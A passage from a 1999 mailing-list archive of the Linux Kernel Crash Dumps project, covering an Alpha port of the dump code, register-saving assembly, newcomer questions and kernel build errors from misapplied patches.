what is the work |>>|> being done in that area in Linux. I would also like to know about the |>>|> various crash facilities that are being provided in Linux. |>> |>> |> |> |>LYCOShop is now open. On your mark, get set, SHOP!!! |>http://shop.lycos.com/ |> From owner-lkcd@oss.sgi.com Mon Dec 13 12:39:33 1999 Received: by oss.sgi.com id ; Mon, 13 Dec 1999 12:39:23 -0800 Received: from mailext12.compaq.com ([207.18.199.188]:31650 "HELO mailext12.compaq.com") by oss.sgi.com with SMTP id ; Mon, 13 Dec 1999 12:39:03 -0800 Received: by mailext12.compaq.com (Postfix, from userid 12345) id DEA57578ED; Mon, 13 Dec 1999 14:37:54 -0600 (CST) Received: from mailint02.im.hou.compaq.com (mailint02.compaq.com [207.18.199.35]) by mailext12.compaq.com (Postfix) with ESMTP id D9C3754601; Mon, 13 Dec 1999 14:37:54 -0600 (CST) Received: by mailint02.im.hou.compaq.com (Postfix, from userid 12345) id CAF21BC4CA; Mon, 13 Dec 1999 14:37:47 -0600 (CST) Received: from cxo3ns.cxo.dec.com (cxo3ns.cxo.dec.com [16.63.0.10]) by mailint02.im.hou.compaq.com (Postfix) with SMTP id 43BCFB2A43; Mon, 13 Dec 1999 14:37:47 -0600 (CST) Received: from brownfur.cxo.dec.com by cxo3ns.cxo.dec.com; (5.65v4.0/1.1.8.2/11Apr96-1001AM) id AA04482; Mon, 13 Dec 1999 13:37:53 -0700 Received: from dhcp192-89.cxo.dec.com by brownfur.cxo.dec.com (5.65v4.0/1.1.10.5/17Feb98-0753AM) id AA03900; Mon, 13 Dec 1999 13:37:52 -0700 Content-Length: 2626 Message-Id: X-Mailer: XFMail 1.4.4 on Linux X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit Mime-Version: 1.0 In-Reply-To: Date: Wed, 15 Dec 1999 08:38:08 -0700 (MST) Reply-To: Brian Hall From: Brian Hall To: Matt Robinson Subject: Re: Volunteer to work with Alpha port of lkcd Cc: lkcd@oss.sgi.com Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing OK, I am actively working on this now (the Linux Alpha machines I have access to have had problems; I've put the kernel tree on an NFS mount so I can continue to work). Do I have to do the inline assembly to save the PC and RA registers, or can I simply stuff them into the dump header structure? BTW, I notice lots of 32 bit fields in the header, those will all have to be 64 bit for Alpha, won't they? Certainly at least the registers will; I think having others in the structure 32 bit may cause alignment problems on the Alpha. So, can I just make the dh_esp and dh_eip uint64_t, remove the inline asm and the call to __dump_save_panic_regs, and just do: /* This is __dump_execute */ dump_header.dh_esp = regs->pc; /* from arch/alpha/kernel/traps.c, r26 appears to be ra */ dump_header.dh_eip = regs->r26; /* dump out the header */ Also, what do you mean by putting a hook in die_if_kernel()? Do you mean to call the kernel dump routine - dump_execute() ? On 01-Dec-1999 Matt Robinson wrote: > The first thing to do is to take the kernel code in > arch/i386/kernel/vmdump.c and copy it to arch/alpha/kernel, modify > the makefile, and then modify the calls for saving the pt_regs. > > The code for saving the registers is mostly correct, except for: > > if (regs) { > memcpy((void *)&(dump_header.dh_regs), (const void *)regs, > sizeof(struct pt_regs)); >> if (!user_mode(regs)) { >> dump_header.dh_regs.esp = (unsigned long) (regs + 1); >> } > } > > Those lines aren't necessarily needed -- they are I386 specific. We > have to adjust the esp based on the processor mode. > > Also, the code for: > > /* save the dump specific esp/eip */ > __asm__ __volatile__(" > pushl %%eax\n > movl %%esp, %%eax\n > movl %%eax, %0\n > popl %%eax\n" > : "=g" (dump_header.dh_esp) > ); > __asm__ __volatile__("pushl %eax\n"); > __dump_save_panic_regs(); > __asm__ __volatile__("popl %eax\n"); > > All of this is set up just to save the stack pointer and program > counter for this box, as the pt_regs on I386 boxes don't necessarily > point to the right location. We want to be able to walk back from > the exception where that is possible. > > In looking at the Alpha stuff, I think you can start by saving the PC > and RA values (not sure which $XX they represent), and also put a hook > into die_if_kernel() in traps.c. -- Brian Hall Linux Consultant From owner-lkcd@oss.sgi.com Mon Dec 13 13:11:03 1999 Received: by oss.sgi.com id ; Mon, 13 Dec 1999 13:10:53 -0800 Received: from pneumatic-tube.sgi.com ([204.94.214.22]:11056 "EHLO pneumatic-tube.sgi.com") by oss.sgi.com with ESMTP id ; Mon, 13 Dec 1999 13:10:43 -0800 Received: from awesome.engr.sgi.com (awesome.engr.sgi.com [150.166.49.119]) by pneumatic-tube.sgi.com (980327.SGI.8.8.8-aspam/980310.SGI-aspam) via ESMTP id NAA03240 for ; Mon, 13 Dec 1999 13:11:19 -0800 (PST) mail_from (yakker@cthulhu.engr.sgi.com) Received: from localhost (yakker@localhost) by awesome.engr.sgi.com (980427.SGI.8.8.8/970903.SGI.AUTOCF) via SMTP id NAA33419; Mon, 13 Dec 1999 13:08:18 -0800 (PST) Date: Mon, 13 Dec 1999 13:08:17 -0800 (PST) From: Matt Robinson To: Brian Hall cc: Matt Robinson , lkcd@oss.sgi.com Subject: Re: Volunteer to work with Alpha port of lkcd In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing On Wed, 15 Dec 1999, Brian Hall wrote: |>OK, I am actively working on this now (the Linux Alpha machines I have access |>to have had problems; I've put the kernel tree on an NFS mount so I can |>continue to work). |> |>Do I have to do the inline assembly to save the PC and RA registers, or can I |>simply stuff them into the dump header structure? BTW, I notice lots of 32 bit |>fields in the header, those will all have to be 64 bit for Alpha, won't they? |>Certainly at least the registers will; I think having others in the structure |>32 bit may cause alignment problems on the Alpha. The problem is from panic(), you don't have the registers, so you need to grab them. That way the 'lcrash' code has a point to start with as far as the failing process is concerned. Hence the "if (regs)" stuff. |>So, can I just make the dh_esp and dh_eip uint64_t, remove the inline asm and |>the call to __dump_save_panic_regs, and just do: |> |>/* This is __dump_execute */ |> |>dump_header.dh_esp = regs->pc; |>/* from arch/alpha/kernel/traps.c, r26 appears to be ra */ |>dump_header.dh_eip = regs->r26; |> |>/* dump out the header */ The dump_header uses pt_regs, and if the alpha stuff is translated right for your build, it should be the right type without you having to do anything. Such as: regs->esp is 32-bit (long) for i386; however regs->pc is 64-bit (unsigned long) for alpha. No type-casting should be necessary, assuming architecture compatible pt_regs stuff is being used. If you do see a problem, however, let me know and I'll fix it in the main code. |>Also, what do you mean by putting a hook in die_if_kernel()? Do you mean to |>call the kernel dump routine - dump_execute() ? Correct. Be sure that panic() also calls dump_execute(). |>On 01-Dec-1999 Matt Robinson wrote: |>> The first thing to do is to take the kernel code in |>> arch/i386/kernel/vmdump.c and copy it to arch/alpha/kernel, modify |>> the makefile, and then modify the calls for saving the pt_regs. |>> |>> The code for saving the registers is mostly correct, except for: |>> |>> if (regs) { |>> memcpy((void *)&(dump_header.dh_regs), (const void *)regs, |>> sizeof(struct pt_regs)); |>>> if (!user_mode(regs)) { |>>> dump_header.dh_regs.esp = (unsigned long) (regs + 1); |>>> } |>> } |>> |>> Those lines aren't necessarily needed -- they are I386 specific. We |>> have to adjust the esp based on the processor mode. |>> |>> Also, the code for: |>> |>> /* save the dump specific esp/eip */ |>> __asm__ __volatile__(" |>> pushl %%eax\n |>> movl %%esp, %%eax\n |>> movl %%eax, %0\n |>> popl %%eax\n" |>> : "=g" (dump_header.dh_esp) |>> ); |>> __asm__ __volatile__("pushl %eax\n"); |>> __dump_save_panic_regs(); |>> __asm__ __volatile__("popl %eax\n"); |>> |>> All of this is set up just to save the stack pointer and program |>> counter for this box, as the pt_regs on I386 boxes don't necessarily |>> point to the right location. We want to be able to walk back from |>> the exception where that is possible. |>> |>> In looking at the Alpha stuff, I think you can start by saving the PC |>> and RA values (not sure which $XX they represent), and also put a hook |>> into die_if_kernel() in traps.c. |> |>-- |>Brian Hall |>Linux Consultant |> From owner-lkcd@oss.sgi.com Tue Dec 14 01:23:09 1999 Received: by oss.sgi.com id ; Tue, 14 Dec 1999 01:22:59 -0800 Received: from fes-qout.whowhere.com ([209.1.236.7]:5622 "HELO mailcity.com") by oss.sgi.com with SMTP id ; Tue, 14 Dec 1999 01:22:41 -0800 Received: from Unknown/Local ([?.?.?.?]) by mailcity.com; Tue Dec 14 01:20:22 1999 To: "Matt Robinson" Date: Tue, 14 Dec 1999 01:20:22 -0800 From: "Ashish Arora" Message-ID: Mime-Version: 1.0 Cc: lkcd@oss.sgi.com X-Sent-Mail: off Reply-To: ashisharora@mailcity.com X-Mailer: MailCity Service Subject: Re:Info for LKCD X-Sender-Ip: 192.35.232.115 Organization: MailCity (http://www.mailcity.lycos.com:80) Content-Type: text/plain; charset=us-ascii Content-Language: en Content-Length: 3482 Content-Transfer-Encoding: 7bit Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing Hi Matt, Can you also give me the details of the Trace facilities that are being implemented or are already implemented in Linux. Also what is the work being done in this field of trace and what type of trace is being worked on(if some work is going on in this regard). I would also like to know what other features of RAS(Reliability, Availability and Servicability) are already implemented in Linux or are being implemented. --Ashish -- On Mon, 13 Dec 1999 09:47:32 Matt Robinson wrote: >Hi, Ashish. You can get most of your answers from the FAQ, but >please visit our website: > > http://oss.sgi.com/projects/lkcd > >If you have specific questions that the FAQ doesn't answer, we'll >do what we can to help. Also, feel free to review the mail archive >for this newsgroup, also available via the URL above, to see what >has been discussed in the past. > >--Matt > >On Mon, 13 Dec 1999, Ashish Arora wrote: >|>I would like to know where i can get the source code for the lkcd project. I would also like to ask the eople working on the Mission Critical Linux to tell me about the aspects of Mission Critical Computing they are dealing in at present. And what are > >the facilities that will be provided in that Linux. >|> Matt, can u tell me more about what is really being done in the ares of system Dumps and what is being dealt in system crashes, what is the solution for system crash. >|> >|>- Ashish >|> >|> >|>On Mon, 13 Dec 1999 00:25:47 Matt Robinson wrote: >|>>There are a few development fronts in the area of system dumps. >|>>The LKCD project is one such effort, although there is an additional >|>>effort from the folks at Mission Critical Linux, who are on this list >|>>and can provide information about their work. Beyond that, there are >|>>a few things that provide information about system crashes, but that >|>>doesn't really address your need for system dumps. >|>> >|>>If you've got questions about LKCD, check out: >|>> >|>> http://oss.sgi.com/projects/lkcd/faq.html >|>> >|>>We consider it the foundation for system dumps in Linux, for both >|>>now and in the future. Your mileage may vary. :) >|>> >|>>You can also download the code and see our implementation mechanism >|>>if you're curious about the code. It's fairly straightforward. >|>> >|>>I'm in the process of writing a paper for our talk at LinuxExpo on >|>>LKCD, and when it's finished and thoroughly reviewed, I'll send it >|>>out. For those of you who'd like to attend the talk, Tom and I will >|>>be in New York in February at LinuxExpo to discuss LKCD (along with >|>>other efforts in the community) and how we can make kernel dumps a >|>>supported reality for commercial Linux users. >|>> >|>>--Matt >|>> >|>>P.S. To everyone out there, I'll send out a new News bulletin as to >|>> where we're at with things here, including what we're working on, >|>> what we need from the community, etc. Thanks for all your support. >|>> >|>>On Mon, 13 Dec 1999, Ashish Arora wrote: >|>>|> Can any one guide me to what is the system dump and what is the work >|>>|> being done in that area in Linux. I would also like to know about the >|>>|> various crash facilities that are being provided in Linux. >|>> >|>> >|> >|> >|>LYCOShop is now open. On your mark, get set, SHOP!!! >|>http://shop.lycos.com/ >|> > > > LYCOShop is now open. On your mark, get set, SHOP!!! http://shop.lycos.com/ From owner-lkcd@oss.sgi.com Tue Dec 14 01:34:09 1999 Received: by oss.sgi.com id ; Tue, 14 Dec 1999 01:33:59 -0800 Received: from pneumatic-tube.sgi.com ([204.94.214.22]:7003 "EHLO pneumatic-tube.sgi.com") by oss.sgi.com with ESMTP id ; Tue, 14 Dec 1999 01:33:45 -0800 Received: from awesome.engr.sgi.com (awesome.engr.sgi.com [150.166.49.119]) by pneumatic-tube.sgi.com (980327.SGI.8.8.8-aspam/980310.SGI-aspam) via ESMTP id BAA03881 for ; Tue, 14 Dec 1999 01:34:16 -0800 (PST) mail_from (yakker@cthulhu.engr.sgi.com) Received: from localhost (yakker@localhost) by awesome.engr.sgi.com (980427.SGI.8.8.8/970903.SGI.AUTOCF) via SMTP id BAA36295; Tue, 14 Dec 1999 01:31:15 -0800 (PST) Date: Tue, 14 Dec 1999 01:31:14 -0800 (PST) From: Matt Robinson To: Ashish Arora cc: Matt Robinson , lkcd@oss.sgi.com Subject: Re:Info for LKCD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing I'm afraid you'll have to research a lot of this on your own, Ashish. If there are others on this list that can contribute, feel free, however, I think spoon-fed knowledge can be a bit dangerous if given too often. --Matt On Tue, 14 Dec 1999, Ashish Arora wrote: |>Hi Matt, |> Can you also give me the details of the Trace facilities that are being implemented or are already implemented in Linux. Also what is the work being done in this field of trace and what type of trace is being worked on(if some work is going on i n this regard). |> I would also like to know what other features of RAS(Reliability, Availability and Servicability) are already implemented in Linux or are being implemented. |>--Ashish |>-- |> |>On Mon, 13 Dec 1999 09:47:32 Matt Robinson wrote: |>>Hi, Ashish. You can get most of your answers from the FAQ, but |>>please visit our website: |>> |>> http://oss.sgi.com/projects/lkcd |>> |>>If you have specific questions that the FAQ doesn't answer, we'll |>>do what we can to help. Also, feel free to review the mail archive |>>for this newsgroup, also available via the URL above, to see what |>>has been discussed in the past. |>> |>>--Matt |>> |>>On Mon, 13 Dec 1999, Ashish Arora wrote: |>>|>I would like to know where i can get the source code for the lkcd project. I would also like to ask the eople working on the Mission Critical Linux to tell me about the aspects of Mission Critical Computing they are dealing in at present. And what a re |>> |>>the facilities that will be provided in that Linux. |>>|> Matt, can u tell me more about what is really being done in the ares of system Dumps and what is being dealt in system crashes, what is the solution for system crash. |>>|> |>>|>- Ashish |>>|> |>>|> |>>|>On Mon, 13 Dec 1999 00:25:47 Matt Robinson wrote: |>>|>>There are a few development fronts in the area of system dumps. |>>|>>The LKCD project is one such effort, although there is an additional |>>|>>effort from the folks at Mission Critical Linux, who are on this list |>>|>>and can provide information about their work. Beyond that, there are |>>|>>a few things that provide information about system crashes, but that |>>|>>doesn't really address your need for system dumps. |>>|>> |>>|>>If you've got questions about LKCD, check out: |>>|>> |>>|>> http://oss.sgi.com/projects/lkcd/faq.html |>>|>> |>>|>>We consider it the foundation for system dumps in Linux, for both |>>|>>now and in the future. Your mileage may vary. :) |>>|>> |>>|>>You can also download the code and see our implementation mechanism |>>|>>if you're curious about the code. It's fairly straightforward. |>>|>> |>>|>>I'm in the process of writing a paper for our talk at LinuxExpo on |>>|>>LKCD, and when it's finished and thoroughly reviewed, I'll send it |>>|>>out. For those of you who'd like to attend the talk, Tom and I will |>>|>>be in New York in February at LinuxExpo to discuss LKCD (along with |>>|>>other efforts in the community) and how we can make kernel dumps a |>>|>>supported reality for commercial Linux users. |>>|>> |>>|>>--Matt |>>|>> |>>|>>P.S. To everyone out there, I'll send out a new News bulletin as to |>>|>> where we're at with things here, including what we're working on, |>>|>> what we need from the community, etc. Thanks for all your support. |>>|>> |>>|>>On Mon, 13 Dec 1999, Ashish Arora wrote: |>>|>>|> Can any one guide me to what is the system dump and what is the work |>>|>>|> being done in that area in Linux. I would also like to know about the |>>|>>|> various crash facilities that are being provided in Linux. |>>|>> |>>|>> |>>|> |>>|> |>>|>LYCOShop is now open. On your mark, get set, SHOP!!! |>>|>http://shop.lycos.com/ |>>|> |>> |>> |>> |> |> |>LYCOShop is now open. On your mark, get set, SHOP!!! |>http://shop.lycos.com/ |> From owner-lkcd@oss.sgi.com Tue Dec 14 22:30:02 1999 Received: by oss.sgi.com id ; Tue, 14 Dec 1999 22:29:52 -0800 Received: from fes-qout.whowhere.com ([209.1.236.7]:59861 "HELO mailcity.com") by oss.sgi.com with SMTP id ; Tue, 14 Dec 1999 22:29:39 -0800 Received: from Unknown/Local ([?.?.?.?]) by mailcity.com; Tue Dec 14 22:27:17 1999 To: lkcd@oss.sgi.com Date: Tue, 14 Dec 1999 22:27:17 -0800 From: "Ashish Arora" Message-ID: Mime-Version: 1.0 X-Sent-Mail: off Reply-To: ashisharora@mailcity.com X-Mailer: MailCity Service Subject: Problem in Applying the patch X-Sender-Ip: 192.35.232.115 Attachments: xx.out Organization: MailCity (http://www.mailcity.lycos.com:80) Content-Type: multipart/mixed; boundary="=_-=_-DAKHNALJEJFOAAAA" Content-Transfer-Encoding: 7bit Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing This is a multi-part message in MIME format. You need a MIME compliant mail reader to completely decode it. --=_-=_-DAKHNALJEJFOAAAA Content-Type: text/plain; charset=us-ascii Content-Language: en Content-Length: 390 Content-Transfer-Encoding: 7bit Hello All, I applied the patch for the lkcd 1.0.3. to the linux kernel version 2.2.12 but i faced the problem that it was not able to find the declarations of AS_KERNEL, AS_USER, AS_REMOTE etc. I am attaching the file for reference. Can anyone guide me how to resolve this problem. Ashish LYCOShop is now open. On your mark, get set, SHOP!!! http://shop.lycos.com/ --=_-=_-DAKHNALJEJFOAAAA Content-Type: application/x-unknown; name="xx.out" Content-Length: 5368 Content-Transfer-Encoding: 7bit memory.c: In function `map_user_kiobuf': memory.c:1058: structure has no member named `iob_astype' memory.c:1059: `AS_KERNEL' undeclared (first use in this function) memory.c:1059: (Each undeclared identifier is reported only once memory.c:1059: for each function it appears in.) memory.c:1066: `AS_IOSPACE' undeclared (first use in this function) memory.c:1067: `AS_REMOTE' undeclared (first use in this function) memory.c:1071: `AS_USER' undeclared (first use in this function) memory.c:1060: warning: unreachable code at beginning of switch statement memory.c: At top level: memory.c:1171: redefinition of `get_page' memory.c:978: `get_page' previously defined here memory.c:1193: redefinition of `get_page_map' memory.c:1000: `get_page_map' previously defined here memory.c:1213: redefinition of `map_user_kiobuf' memory.c:1020: `map_user_kiobuf' previously defined here memory.c:1325: redefinition of `unmap_kiobuf' memory.c:1148: `unmap_kiobuf' previously defined here {standard input}: Assembler messages: {standard input}:2085: Fatal error: Symbol get_page already defined. make[2]: *** [memory.o] Error 1 make[1]: *** [first_rule] Error 2 make: *** [_dir_mm] Error 2 g directory `/usr/src/linux-2.2.12/drivers/char' make[2]: Leaving directory `/usr/src/linux-2.2.12/drivers/char' make -C net make[2]: Entering directory `/usr/src/linux-2.2.12/drivers/net' make -C fc make[3]: Entering directory `/usr/src/linux-2.2.12/drivers/net/fc' make all_targets make[4]: Entering directory `/usr/src/linux-2.2.12/drivers/net/fc' make[4]: Nothing to be done for `all_targets'. make[4]: Leaving directory `/usr/src/linux-2.2.12/drivers/net/fc' make[3]: Leaving directory `/usr/src/linux-2.2.12/drivers/net/fc' make all_targets make[3]: Entering directory `/usr/src/linux-2.2.12/drivers/net' make[3]: Nothing to be done for `all_targets'. make[3]: Leaving directory `/usr/src/linux-2.2.12/drivers/net' make[2]: Leaving directory `/usr/src/linux-2.2.12/drivers/net' make -C misc make[2]: Entering directory `/usr/src/linux-2.2.12/drivers/misc' make all_targets make[3]: Entering directory `/usr/src/linux-2.2.12/drivers/misc' make[3]: Nothing to be done for `all_targets'. make[3]: Leaving directory `/usr/src/linux-2.2.12/drivers/misc' make[2]: Leaving directory `/usr/src/linux-2.2.12/drivers/misc' make -C sound make[2]: Entering directory `/usr/src/linux-2.2.12/drivers/sound' make -C lowlevel make[3]: Entering directory `/usr/src/linux-2.2.12/drivers/sound/lowlevel' make all_targets make[4]: Entering directory `/usr/src/linux-2.2.12/drivers/sound/lowlevel' make[4]: Nothing to be done for `all_targets'. make[4]: Leaving directory `/usr/src/linux-2.2.12/drivers/sound/lowlevel' make[3]: Leaving directory `/usr/src/linux-2.2.12/drivers/sound/lowlevel' make all_targets make[3]: Entering directory `/usr/src/linux-2.2.12/drivers/sound' make[3]: Nothing to be done for `all_targets'. make[3]: Leaving directory `/usr/src/linux-2.2.12/drivers/sound' make[2]: Leaving directory `/usr/src/linux-2.2.12/drivers/sound' make -C pci make[2]: Entering directory `/usr/src/linux-2.2.12/drivers/pci' make all_targets make[3]: Entering directory `/usr/src/linux-2.2.12/drivers/pci' make[3]: Nothing to be done for `all_targets'. make[3]: Leaving directory `/usr/src/linux-2.2.12/drivers/pci' make[2]: Leaving directory `/usr/src/linux-2.2.12/drivers/pci' make -C video make[2]: Entering directory `/usr/src/linux-2.2.12/drivers/video' make all_targets make[3]: Entering directory `/usr/src/linux-2.2.12/drivers/video' make[3]: Nothing to be done for `all_targets'. make[3]: Leaving directory `/usr/src/linux-2.2.12/drivers/video' make[2]: Leaving directory `/usr/src/linux-2.2.12/drivers/video' make -C scsi make[2]: Entering directory `/usr/src/linux-2.2.12/drivers/scsi' make all_targets make[3]: Entering directory `/usr/src/linux-2.2.12/drivers/scsi' make[3]: Nothing to be done for `all_targets'. make[3]: Leaving directory `/usr/src/linux-2.2.12/drivers/scsi' make[2]: Leaving directory `/usr/src/linux-2.2.12/drivers/scsi' make -C pnp make[2]: Entering directory `/usr/src/linux-2.2.12/drivers/pnp' make all_targets make[3]: Entering directory `/usr/src/linux-2.2.12/drivers/pnp' make[3]: Nothing to be done for `all_targets'. make[3]: Leaving directory `/usr/src/linux-2.2.12/drivers/pnp' make[2]: Leaving directory `/usr/src/linux-2.2.12/drivers/pnp' make -C cdrom make[2]: Entering directory `/usr/src/linux-2.2.12/drivers/cdrom' make all_targets make[3]: Entering directory `/usr/src/linux-2.2.12/drivers/cdrom' make[3]: Nothing to be done for `all_targets'. make[3]: Leaving directory `/usr/src/linux-2.2.12/drivers/cdrom' make[2]: Leaving directory `/usr/src/linux-2.2.12/drivers/cdrom' make all_targets make[2]: Entering directory `/usr/src/linux-2.2.12/drivers' make[2]: Nothing to be done for `all_targets'. make[2]: Leaving directory `/usr/src/linux-2.2.12/drivers' make[1]: Leaving directory `/usr/src/linux-2.2.12/drivers' make -C mm make[1]: Entering directory `/usr/src/linux-2.2.12/mm' make all_targets make[2]: Entering directory `/usr/src/linux-2.2.12/mm' gcc -D__KERNEL__ -I/usr/src/linux-2.2.12/include -Wall -Wstrict-prototypes -O2 -fomit-frame-pointer -fno-strict-aliasing -pipe -fno-strength-reduce -m386 -DCPU=386 -c -o memory.o memory.c make[2]: Leaving directory `/usr/src/linux-2.2.12/mm' make[1]: Leaving directory `/usr/src/linux-2.2.12/mm' --=_-=_-DAKHNALJEJFOAAAA-- From owner-lkcd@oss.sgi.com Tue Dec 14 23:16:12 1999 Received: by oss.sgi.com id ; Tue, 14 Dec 1999 23:16:02 -0800 Received: from ppp0.ocs.com.au ([203.34.97.3]:52488 "HELO mail.ocs.com.au") by oss.sgi.com with SMTP id ; Tue, 14 Dec 1999 23:15:52 -0800 Received: (qmail 3986 invoked by uid 502); 15 Dec 1999 07:14:45 -0000 Received: (qmail 3973 invoked from network); 15 Dec 1999 07:14:43 -0000 Received: from ocs3.ocs-net (192.168.255.3) by mail.ocs.com.au with SMTP; 15 Dec 1999 07:14:43 -0000 X-Mailer: exmh version 2.1.1 10/15/1999 From: Keith Owens To: ashisharora@mailcity.com cc: lkcd@oss.sgi.com Subject: Re: Problem in Applying the patch In-reply-to: Your message of "Tue, 14 Dec 1999 22:27:17 -0800." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 15 Dec 1999 18:14:42 +1100 Message-ID: <25634.945242082@ocs3.ocs-net> Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing On Tue, 14 Dec 1999 22:27:17 -0800, "Ashish Arora" wrote: > I applied the patch for the lkcd 1.0.3. to the linux kernel version 2.2.12 but i faced the problem that it was not able to find the declarations of AS_KERNEL, AS_USER, AS_REMOTE etc. I am attaching the file for reference. You have to apply the raw I/O patch (sgi+straw2.2.13.patch) *before* the lkcd patch. From owner-lkcd@oss.sgi.com Tue Dec 14 23:20:22 1999 Received: by oss.sgi.com id ; Tue, 14 Dec 1999 23:20:12 -0800 Received: from pneumatic-tube.sgi.com ([204.94.214.22]:18744 "EHLO pneumatic-tube.sgi.com") by oss.sgi.com with ESMTP id ; Tue, 14 Dec 1999 23:20:04 -0800 Received: from awesome.engr.sgi.com (awesome.engr.sgi.com [150.166.49.119]) by pneumatic-tube.sgi.com (980327.SGI.8.8.8-aspam/980310.SGI-aspam) via ESMTP id XAA08482 for ; Tue, 14 Dec 1999 23:20:49 -0800 (PST) mail_from (yakker@cthulhu.engr.sgi.com) Received: from localhost (yakker@localhost) by awesome.engr.sgi.com (980427.SGI.8.8.8/970903.SGI.AUTOCF) via SMTP id XAA41750; Tue, 14 Dec 1999 23:17:46 -0800 (PST) Date: Tue, 14 Dec 1999 23:17:45 -0800 (PST) From: Matt Robinson To: Keith Owens cc: ashisharora@mailcity.com, lkcd@oss.sgi.com Subject: Re: Problem in Applying the patch In-Reply-To: <25634.945242082@ocs3.ocs-net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing Ashish, have you read the FAQ? http://oss.sgi.com/projects/lkcd/faq.html#2.3 This should have answered your question. --Matt On Wed, 15 Dec 1999, Keith Owens wrote: |>On Tue, 14 Dec 1999 22:27:17 -0800, |>"Ashish Arora" wrote: |>> I applied the patch for the lkcd 1.0.3. to the linux kernel version 2.2.12 but i faced the problem that it was not able to find the declarations of AS_KERNEL, AS_USER, AS_REMOTE etc. I am attaching the file for reference. |> |>You have to apply the raw I/O patch (sgi+straw2.2.13.patch) *before* |>the lkcd patch. |> From owner-lkcd@oss.sgi.com Thu Dec 16 00:39:25 1999 Received: by oss.sgi.com id ; Thu, 16 Dec 1999 00:39:15 -0800 Received: from fes-qout.whowhere.com ([209.1.236.7]:13812 "HELO mailcity.com") by oss.sgi.com with SMTP id ; Thu, 16 Dec 1999 00:38:58 -0800 Received: from Unknown/Local ([?.?.?.?]) by mailcity.com; Thu Dec 16 00:37:37 1999 To: lkcd@oss.sgi.com Date: Thu, 16 Dec 1999 00:37:37 -0800 From: "Ashish Arora" Message-ID: Mime-Version: 1.0 X-Sent-Mail: off Reply-To: ashisharora@mailcity.com X-Mailer: MailCity Service Subject: Problem with Mission Critical Linux Patch X-Sender-Ip: 192.35.232.115 Organization: MailCity (http://www.mailcity.lycos.com:80) Content-Type: text/plain; charset=us-ascii Content-Language: en Content-Length: 2076 Content-Transfer-Encoding: 7bit Sender: owner-lkcd@oss.sgi.com Precedence: bulk Return-Path: X-Orcpt: rfc822;lkcd-outgoing Hi All , I applied the patch 2.2.13.larry and 2.2.13-zcore 1.0 from the Mission Critical Linux, to 2.2.13 kernel but when i recompiled the kernel, i got an error while compiling. I have attached the error faced below for reference. Can you guide me about this problem and give me a solution for this. -- Ashish i applied the patches. Then issued the following commands make menuconfig make dep;make clean; make bzImage -------------------------------------------------------------------------------- this is the snapshot on the screen when the error occured ---------------------------------------------------------------------------------- gcc -E -C -P -I/usr/src/linux-2.2.13mc/include -imacros /usr/src/linux-2.2.13mc/include/asm-i386 /page_offset.h -Ui386 arch/i386/vmlinux.lds.S >arch/i386/vmlinux.lds ld -m elf_i386 -T /usr/src/linux-2.2.13mc/arch/i386/vmlinux.lds -e stext arch/i386/kernel/head.o arch/i386/kernel/init_task.o init/main.o init/version.o \ --start-group \ arch/i386/kernel/kernel.o arch/i386/mm/mm.o kernel/kernel.o mm/mm.o fs/fs.o ipc/ipc.o \ fs/filesystems.a \ net/network.a \ drivers/block/block.a drivers/char/char.a drivers/misc/misc.a drivers/net/net.a drivers/scsi/scsi.a drivers/cdrom/cdrom.a drivers/pci/pci.a drivers/net/fc/fc.a drivers/pnp/pnp.a drivers/video/video.a \ /usr/src/linux-2.2.13mc/arch/i386/lib/lib.a /usr/src/linux-2.2.13mc/lib/lib.a /usr/src/linux-2.2.13mc/arch/i386/lib/lib.a \ --end-group \ -o vmlinux kernel/kernel.o: In function `save_core': kernel/kernel.o(.text+0xb2b9): undefined reference to `deflateInit_' kernel/kernel.o(.text+0xb2de): undefined reference to `deflateReset' kernel/kernel.o(.text+0xb2f7): undefined reference to `deflate' kernel/kernel.o(.text+0xb4b9): undefined reference to `deflateEnd' kernel/kernel.o(.text+0xb566): undefined reference to `deflateEnd' make: *** [vmlinux] Error 1 LYCOShop is now open. On your mark, get set, SHOP!!! http://shop.lycos.com/ From owner-lkcd@oss.sgi.com Thu Dec 16 13:54:28 1999 Received: by oss.sgi.com id ; Thu, 16 Dec 1999 13:54:18 -0800 Received: from zmamail01.zma.compaq.com ([161.114.64.101]:52494 "HELO zmamail01.zma.compaq.com") by oss.sgi.com with SMTP id ; Thu, 16 Dec 1999 13:54:01 -0800 Received: by zmamail01.zma.compaq.com (Postfix, from userid 12345) id D5C95181; Thu, 16 Dec 1999 16:53:03 -0500 (EST) Received: from cxo3ns.cxo.dec.com (cxo3ns.cxo.dec.com [16.63.0.10]) by zmamail01.zma.compaq.com (Postfix) with SMTP id E23A1326; Thu, 16 Dec 1999 16:53:02 -0500 (EST) Received: from brownfur.cxo.dec.com by cxo3ns.cxo.dec.com; (5.65v4.0/1.1.8.2/11Apr96-1001AM) id AA20313; Thu, 16 Dec 1999 14:53:01 -0700 Received: from dhcp192-89.cxo.dec.com by brownfur.cxo.dec.com (5.65v4.0/1.1.10.5/17Feb98-0753AM) id AA01697; Thu, 16 Dec 1999 14:53:01 -0700 Received: by compaq.com (sSMTP sendmail emulation); Sat, 18 Dec 1999 14:51:51 -0700 Content-Length: 916 Message-Id: X-Mailer: XFMail 1.4.4 on Linux X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit Mime-Version: 1.0 In-Reply-To: Date: Sat, 18 Dec 1999 14:51:51 -0700 (MST) Reply-To: 